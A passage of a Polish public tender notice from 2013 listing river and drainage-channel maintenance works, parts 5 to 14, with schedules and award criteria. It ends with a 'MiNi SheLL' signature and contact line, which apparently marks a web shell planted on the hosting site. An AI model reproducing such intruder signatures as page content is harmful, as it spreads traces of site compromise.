<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.24.60.00-3, 45.24.64.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 15.07.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Mora EL II w km 7+300-15+900 L=8 600 mb m.Łączki,Biskupów,Burgrabice,Sławniowice, gm. Głuchołazy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Roboty do wykonania zgodnie z przedmiarem robót:
- Ręczne wykoszenie porostów gęstych twardych ze skarp.
- Wygrabienie wykoszonych porostów ze skarp o szer. ponad 2,0 m.
- Ręczne ścinanie i karczowanie rzadkich krzaków.
- Wykonanie pojedynczych opasek żerdziowych o śred.10 cm
Termin realizacji robót:od 15.07.2013r. do 30.09.2013r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.24.60.00-3, 45.24.64.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 15.07.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Wigancicki Potok w km 7+630-10+960 L= 3 330 mb- m.Wilemowice,Chciebórz gm.Kamiennik.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Roboty do wykonania zgodnie z przedmiarem robót:
- Ręczne wykoszenie porostów gęstych twardych ze skarp.
- Wygrabienie wykoszonych porostów ze skarp o szer. ponad 2,0 m.
- Usuwanie namułu grubości 20cm z cieków i głębokości do 1,50m i szerokości dna 0,6m 
- Oczyszczenie z namułu przepustów o śred.1,0mprzy zam 1/3 wys
- Oczyszczenie wylotów drenarskich
- Naprawa opasek z kiszki o śr.20 cm grkat III
- Wykopy koparkami podsiębiernymi 0,4m3 na odkład gr kat III
- Ręczne wykoszenie porostów gęstych twardych ze skarp.
- Wygrabienie wykoszonych porostów ze skarp o szer. ponad 2,0 m.
- Wykonanie palisad w gr kat III
- Ułożenie geowłókliny pod narzuty
- Wykonanie narzutu podwodnego
Termin realizacji robót: od 15.07.2013r. do 13.09.2013r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.24.60.00-3, 45.24.64.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 15.07.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Kamienica EL I w km 5+400-11+190 L=5 790mb  m.Wyszków Niwnica gm.Nysa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Roboty do wykonania zgodnie z przedmiarem robót:
- Ręczne ścinanie i karczowanie gęstych krzaków ze zrąbkowaniem
- Ręczne wykoszenie porostów gęstych miękkich ze skarp.
- Wygrabienie wykoszonych porostów ze skarp o szer. ponad 2,0 m.
- Ręczne wykoszenie porostów gęstych twardych ze skarp.
- Wygrabienie wykoszonych porostów ze skarp o szer. ponad 2,0 m.
- Wykonanie płotka żerdziowego o śrd 15 cm
- Wykonanie gabionu płaskiego na skarpie o wymiarach 3x0,23x2.
Termin realizacji robót: od 15.07.2013r. do 16.08.2013r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.24.60.00-3, 45.24.64.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 15.07.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Domaszkowicki EL I w km 0+000-6+400 L=6 400mb m.Kubice Domaszkowice gm Nysa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Roboty do wykonania zgodnie z przedmiarem robót:

- Ręczne ścinanie i karczowanie rzadkich krzaków ze zrąbkowaniem
- Ręczne wykoszenie porostów gęstych twardych ze skarp.
- Wygrabienie wykoszonych porostów ze skarp o szer. ponad 2,0 m.
- Usuwanie namułu gr. 20cm z cieków o głęb.do 1,50 i szer.dna 1,0m-2,0m                                                                          
- Załadunek gruntu z odmulenia i suchego porostu koparkami chwytakowymi i odwóz na odl 4,0 km +opłata składowiska                                                                            
-Naprawa umocnień z płyt nowych w dnie i na skarpach                                            
- Wykonanie koszy z ocynkowanej bez wyprawy o wym.2x0,5x0,5                          
- Wykopy koparkami podsiębiernymi 0,6m3 gr kat II na odkład                             
 -Odtworzenie pobocza drogi z tłucznia                                                                      
- Wykonanie betonowania podmytych przyczółków wraz z robotami towarzyszącymi 
- Oczyszczenie ubezpieczonych powierzchni skarp                                               
-  Usunięcie zatorów z powalonych drzew i krzewów
Termin realizacji robót: od 15.07.2013r. do 16.08.2013r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.24.60.00-3, 45.24.64.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 15.07.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Lubiatowki w km 0+000-5+100 m.Lubiatów gm. Otmuchów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Roboty do wykonania zgodnie z przedmiarem robót:
Wycinanie zakrzaczeń ze skarp porost średni wraz ze zrąbkowaniem
Ręczne wykoszenie porostów gęstych twardych ze skarp.
Wygrabienie wykoszonych porostów ze skarp o szer. ponad 2,0 m.                Oczyszczenie  koryta z zatorów,nieczystości śmieci itp 
Usuwanie namułu gr. 20cm z cieków o głęb.do 1,50 i szer.dna od 0,4m-1,2m
Oczyszczenie z namułu przepustów o śred.0,6m przy zam 1/3 wys
Naprawa płotków żerdziowych o śred.10 cm
Naprawa ubezpieczenia skarp z płyt ażurowych                                                           
Termin realizacji robót: od 15.07.2013r. do 16.08.2013r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.24.60.00-3, 45.24.64.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 15.07.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Biała Woda w km 0+000-7+725 L= 7 725 mbm.Paczków,Kamienica gm.Paczków.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Roboty do wykonania zgodnie z przedmiarem robót:

Wycinanie zakrzaczeń ze skarp porost gęsty wraz ze zrąbkowaniem
Ręczne wykoszenie porostów gęstych twardych ze skarp.
Wygrabienie wykoszonych porostów ze skarp o szer. ponad 2,0 m.
Naprawa płotków żerdziowych o śred.10 +10 cm w gr kat III
Wykonanie bruju z kamienia naturalnego gr 25 cm
Spoinowanie bruków zaprawą cementową
Remont murów z kamienia naturalnego gr 30cm
Ręczny wykop gr kat III na odkład
Ręczny załadudek suchego porostu i nieczystości 
Termin realizacji robót: od 15.07.2013r. Do 30.08.2013 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.24.60.00-3, 45.24.64.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 15.07.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Kanał Ulgi rzeki Świdna w km 0+000 - 1+600 L= 1 600 mb m.Meszno gm.Otmuchów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Roboty do wykonania zgodnie z przedmiarem robót:

Wycinanie zakrzaczeń ze skarp porost gęsty wraz ze zrąbkowaniem
Ręczne wykoszenie porostów gęstych twardych ze skarp.
Zakup+montaż klapy zwrotnej prostej z PHD o śred 0,6m
Wykonanie bruku z kamienia naturalnego na wylocie klapy zwrotnej
Wykonanie płotka żerdziowego o śred 10+10 cm
Wykonanie narzutu nadwodnego z kamienia ciężkiego
Likwidacja łach i nanosów żwirowych
Wykonanie palisadek w gr kat III
Udrożnienie koryta wraz z usunięciem nawisów na skarpach
Rozplantowanie urobku wydobytego z wykopów
Obsiew skarp
Termin realizacji robót: od 15.07.2013r. do 16.08.2013r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.24.60.00-3, 45.24.64.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 15.07.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Czerwona Woda w km 0+000- 4+480 L=4 480 mb m.Ujeździec,Lisie Kąty gm Paczków.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Roboty do wykonania zgodnie z przedmiarem robót:

Wycinanie zakrzaczeń ze skarp porost gęsty wraz ze zrąbkowaniem
Ręczne wykoszenie porostów gęstych twardych ze skarp.
Wygrabienie wykoszonych porostów ze skarp o szer. ponad 2,0 m.
Mechaniczne usunięcie nawisów ze skarp koparkami posiębiernymi 0,6m3 grkat III
Rozplantowanie urobku wydobytego z wykop 
Spoinowanie bruku kamiennego gr20 cm
Remont bruku z kamienia naturalnego gr 25 cm
Termin realizacji robót: od 15.07.2013r. do 13.09.2013r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.24.60.00-3, 45.24.64.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 15.07.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Tarnawka w km 0+000-8+500 L=8 500 mb m.Stary Paczków,Unikowice.Gościce gm Paczków.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Roboty do wykonania zgodnie z przedmiarem robót:

Wycinanie zakrzaczeń ze skarp porost rzadki i gęsty wraz ze zrąbkowaniem
Ręczne wykoszenie porostów gęstych twardych ze skarp.
Wygrabienie wykoszonych porostów ze skarp o szer. ponad 2,0 m.
Usunięci zatorów z koryta rzeki
Usuwanie namułu gr. 20cm z cieków o głęb.do 1,50 i szer.dna od 1,0m-1,2m
Wywóz nieczystości i wydobytego namułu z odwozem na odl.1,0km
Ręczna rozbiórka konstrukcji betonowych
Termin realizacji robót: od 15.07.2013r. do 13.09.2013r.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.24.60.00-3, 45.24.64.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 15.07.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Kanał Ulgi rzeki Tarnawka w km0+000 - 2+825 L=2 825mb m.Paczków,Gościce gm Paczków.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Roboty do wykonania zgodnie z przedmiarem robót:

Wycinanie zakrzaczeń ze skarp porost średni wraz ze zrąbkowaniem
Ręczne wykoszenie porostów gęstych twardych ze skarp.
Wygrabienie wykoszonych porostów ze skarp o szer. ponad 2,0 m.
Oczyszczenie koryta z nieczystości wraz z usunięciem zatorów z wywiezieniem
Usuwanie namułu gr. 20cm z cieków o głęb. do 1,50 i szer. dna od 1,2m
Oczyszczenie koryta rzeki pod mostem jako roboty ręczne z przewozem urobku taczkami
Roboty ziemne wyk. koparkami podsiębiernymi 0,4m3 z odwozem urobku na odl.1,0km
Termin realizacji robót: od 15.07.2013r. do 16.08.2013r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.24.60.00-3, 45.24.64.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 15.07.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com